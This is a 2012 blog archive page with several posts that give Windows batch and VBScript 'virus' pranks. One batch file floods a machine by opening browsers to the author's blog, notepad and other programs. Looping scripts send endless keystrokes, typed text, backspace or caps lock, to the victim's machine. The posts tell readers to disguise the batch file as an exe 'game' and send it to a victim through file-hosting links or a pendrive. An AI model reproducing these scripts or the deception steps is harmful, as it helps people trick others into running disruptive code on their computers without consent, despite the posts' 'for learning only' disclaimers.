Subscribe:

Ads 468x60px

Showing posts with label NotePad. Show all posts
Showing posts with label NotePad. Show all posts

Monday, 23 April 2012

Simply Ebomb Virus Coading With Batch File


 Hi friends...
How are you???
today i am here with a cool tutorial which will tell you how to make ebomb virus in batch file
this is a simple attach which will enable multiple programs at a time. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type

@echo off
start osk
start notepad
start firefox
start calc

and save it as anyname.bat (note: paste the code with "start " in many times to annoy them,when you will write start before any program name it will open that program)


you can also do some additional stuff like enter the message for victim
example message-  * "(now your system is hacked)"
and also you can open some websites to irritate victim
example- start iexplore "http://mahimantra.blogspot.in"
start firefox "http://mahimantra.blogspot.in"
(simply add them in the .bat file you created)
now upload this batch file on net on any free storage website like (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim
you can also convert batch file to exe by converter
and upload it and send link to your friend and tell him its a fantastic game
When victim will open it
he will shocked.....
you can give him via pendrive or any other methode

now i am giving you a simple example for it -
so doing for it open notepad and paste below code in it

code-

@echo off
msg * "(sorry mate your system has been hacked)"
start iexplore "http://mahimantra.blogspot.in"
start firefox "http://mahimantra.blogspot.in"
start notepad
start iexplore "http://mahimantra.blogspot.in"
start firefox "http://mahimantra.blogspot.in"
start notepad
start iexplore "http://mahimantra.blogspot.in"
start firefox "http://mahimantra.blogspot.in"
start notepad
start iexplore "http://mahimantra.blogspot.in"
start firefox "http://mahimantra.blogspot.in"
start notepad
start iexplore "http://mahimantra.blogspot.in"
start firefox "http://mahimantra.blogspot.in"
start notepad
start iexplore "http://mahimantra.blogspot.in"
start firefox "http://mahimantra.blogspot.in"
start notepad
start iexplore "http://mahimantra.blogspot.in"
start firefox "http://mahimantra.blogspot.in"
start notepad
start iexplore "http://mahimantra.blogspot.in"
start firefox "http://mahimantra.blogspot.in"
start notepad
start iexplore "http://mahimantra.blogspot.in"
start firefox "http://mahimantra.blogspot.in"
start notepad
start iexplore "http://mahimantra.blogspot.in"
start firefox "http://mahimantra.blogspot.in"
start notepad
start iexplore "http://mahimantra.blogspot.in"
start firefox "http://mahimantra.blogspot.in"
start notepad
start iexplore "http://mahimantra.blogspot.in"
start firefox "http://mahimantra.blogspot.in"
start notepad
start iexplore "http://mahimantra.blogspot.in"
start firefox "http://mahimantra.blogspot.in"
start notepad
start iexplore "http://mahimantra.blogspot.in"
start firefox "http://mahimantra.blogspot.in"
start notepad
start iexplore "http://mahimantra.blogspot.in"
start firefox "http://mahimantra.blogspot.in"
start notepad

now click on file and than save as



and then simply save it as "mahi.bat"
Now victim has only one way to solve this problem is,restart his system.
You have done..

Note- this tutorial is just for education matter . Dont do it for harm anyone.

If you love my post than post comment below.
Cheers!!!!

Tuesday, 3 April 2012

Script to make your friend fool with this message "This is a Virus. You have been infected"

Hi friends...
i am here with a new trick to make your friend frustrated 
just paste this below code in notepad

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop

now save it with mahimantra.vbs
and send it  to your friend.
when he will make double click on it
he will be mad because he will get a message  "This is a Virus. You have been infected".
To stop it just say him to go on task manager than process than end the process with name wsscript.exe


You have done....
Cheers!!!

NOTE - THESE ARE FOR ONLY LEARNING PURPOSES NOT FOR MISUSE.
           USE IT FOR FUN NOT FOR HARM TO ANY ONE.

Script to hit backspace simultaneously

Hi friends...
i am here with a new trick to make your friend frustrated 
just paste this below code in notepad

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

now save it with mahimantra.vbs
and send it  to your friend.
when he will make double click on it
he will be mad because his backspace button will press automaticaly again anad again
to stop it just say him to go on task manager than process than end the process with name wsscript.exe


You have done....
Cheers!!!

NOTE - THESE ARE FOR ONLY LEARNING PURPOSES NOT FOR MISUSE.
           USE IT FOR FUN NOT FOR HARM TO ANY ONE.

How to make disco of capslock button

Hi friends...
i am here with a new trick to make you caps lock button on of simultaneously
just paste this below code in notepad


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


and save it as anyname.vbs

now double click on it and enjoy the fun...
now if you want to end this just go to task manager and than process than end the process with name wsscript.exe

You have done....
Cheers!!!

NOTE - THESE ARE FOR ONLY LEARNING PURPOSES NOT FOR MISUSE.
           USE IT FOR FUN NOT FOR HARM TO ANY ONE.